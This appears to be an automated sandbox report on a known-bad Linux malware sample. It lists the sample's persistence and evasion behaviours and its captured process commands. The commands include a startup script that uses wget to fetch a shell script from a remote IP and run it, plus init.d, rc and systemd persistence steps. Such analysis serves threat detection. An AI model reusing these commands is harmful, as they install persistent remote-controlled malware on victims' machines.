Analysis Overview
SHA256
4bafa66638b4631077e617f850abdec293c5cde65cd12d247bca0c5b029e8357
Threat Level: Known bad
The file 20073737305.zip was found to be: Known bad.
Malicious Activity Summary
yara_template
File and Directory Permissions Modification
Modifies Watchdog functionality
Modifies init.d
Checks mountinfo of local process
Creates/modifies environment variables
Modifies rc script
Modifies systemd
Modifies Bash startup script
Changes its process name
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-25 09:15
Signatures
yara_template
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-25 09:15
Reported
2024-11-25 09:17
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
148s
Max time network
129s
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | /bin/sh | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/sh | N/A |
| N/A | N/A | /bin/sh | N/A |
| N/A | N/A | /bin/chmod | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /dev/watchdog | /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 | N/A |
Checks mountinfo of local process
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /proc/1523/mountinfo | /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 | N/A |
Creates/modifies environment variables
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /etc/profile | /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 | N/A |
Modifies init.d
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /etc/init.d/system | /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 | N/A |
| File opened for modification | /etc/init.d/sh | /bin/sh | N/A |
Modifies rc script
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /etc/rc.local | /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 | N/A |
Modifies systemd
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /etc/systemd/system/custom.service | /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 | N/A |
Modifies Bash startup script
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /etc/profile | /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 | N/A |
Changes its process name
| Description | Indicator | Process | Target |
|---|---|---|---|
| Changes the process name, possibly in an attempt to hide itself | N/A | /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /proc/filesystems | /bin/systemctl | N/A |
| File opened for reading | /proc/self/stat | /bin/systemctl | N/A |
| File opened for reading | /proc/cmdline | /bin/systemctl | N/A |
| File opened for reading | /proc/707/cmdline | /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 | N/A |
| File opened for reading | /proc/self/status | /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 | N/A |
| File opened for reading | /proc/1/cgroup | /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 | N/A |
| File opened for reading | /proc/1/sched | /bin/systemctl | N/A |
| File opened for reading | /proc/filesystems | /bin/mkdir | N/A |
| File opened for reading | /proc/1530/status | /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 | N/A |
| File opened for reading | /proc/1531/status | /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 | N/A |
| File opened for reading | /proc/1/cmdline | /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 | N/A |
| File opened for reading | /proc/sys/kernel/osrelease | /bin/systemctl | N/A |
| File opened for reading | /proc/1/environ | /bin/systemctl | N/A |
Processes
/tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90
[/tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90]
/bin/sh
[sh -c systemctl enable custom.service >/dev/null 2>&1]
/bin/systemctl
[systemctl enable custom.service]
/bin/sh
[sh -c chmod +x /etc/init.d/system >/dev/null 2>&1]
/bin/chmod
[chmod +x /etc/init.d/system]
/bin/sh
[sh -c ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1]
/bin/ln
[ln -s /etc/init.d/system /etc/rcS.d/S99system]
/bin/sh
[sh -c echo "#!/bin/sh # /etc/init.d/sh case \"$1\" in start) echo 'Starting sh' /bin/sh & wget http://193.143.1.70/ -O /tmp/lol.sh chmod +x /tmp/lol.sh /tmp/lol.sh & ;; stop) echo 'Stopping sh' killall sh ;; restart) $0 stop $0 start ;; *) echo \"Usage: $0 {start|stop|restart}\" exit 1 ;; esac exit 0" > /etc/init.d/sh]
/bin/sh
[sh -c chmod +x /etc/init.d/sh >/dev/null 2>&1]
/bin/chmod
[chmod +x /etc/init.d/sh]
/bin/sh
[sh -c mkdir -p /etc/rc.d >/dev/null 2>&1]
/bin/mkdir
[mkdir -p /etc/rc.d]
/bin/sh
[sh -c ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1]
/bin/ln
[ln -s /etc/init.d/sh /etc/rc.d/S99sh]
Network
Files
/etc/systemd/system/custom.service
/etc/inittab
/boot/bootcmd
/etc/init.d/system
/etc/init.d/sh
/etc/motd